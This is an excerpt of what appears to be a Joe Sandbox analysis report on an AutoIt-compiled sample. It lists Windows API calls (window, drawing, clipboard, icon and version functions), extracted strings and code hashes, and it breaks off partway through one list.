                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                                                            • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                                                            • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                                                                            • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                                                                            • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                            • API String ID: 4040870279-2373415609
                                                                                                                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                                                                              • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                                                                              • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                                                                              • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                                                                              • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                                                                              • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                                                                              • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                                                                              • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                                                                              • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 69173610-0
                                                                                                                                                                            • Opcode ID: 930605f3cd1c335a452d6420eef3f3c10f8d3d9e6664604232036969332d5250
                                                                                                                                                                            • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                                                                                            • Opcode Fuzzy Hash: 930605f3cd1c335a452d6420eef3f3c10f8d3d9e6664604232036969332d5250
                                                                                                                                                                            • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                            • API String ID: 1038674560-3360698832
                                                                                                                                                                            • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                                                                            • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                                                                                            • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                                                                            • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1582027408-0
                                                                                                                                                                            • Opcode ID: 697ef1e2b469c7a94178de5208286552364449c38c8500f3df1fcdb24db8d4eb
                                                                                                                                                                            • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                                                                            • Opcode Fuzzy Hash: 697ef1e2b469c7a94178de5208286552364449c38c8500f3df1fcdb24db8d4eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                                                                            • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                            • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                                                                            • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                            • String ID: ($,$tooltips_class32
                                                                                                                                                                            • API String ID: 541082891-3320066284
                                                                                                                                                                            • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                            • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                                                                            • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                            • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00454DCF
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00454DE2
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00454E04
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00454E24
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                                                                                              • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                                                                            • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                                                                            • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                            • API String ID: 2511167534-1154884017
                                                                                                                                                                            • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                                                            • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                                                            • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00436B79
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436C31
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                            • API String ID: 1503153545-1459072770
                                                                                                                                                                            • Opcode ID: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
                                                                                                                                                                            • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                                                                            • Opcode Fuzzy Hash: 4bf5914395717010b0ea9e2d69638f6034391d2624482ee6cf2f9dbb9f61e865
                                                                                                                                                                            • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                                                                            • _fseek.LIBCMT ref: 004527FC
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00452871
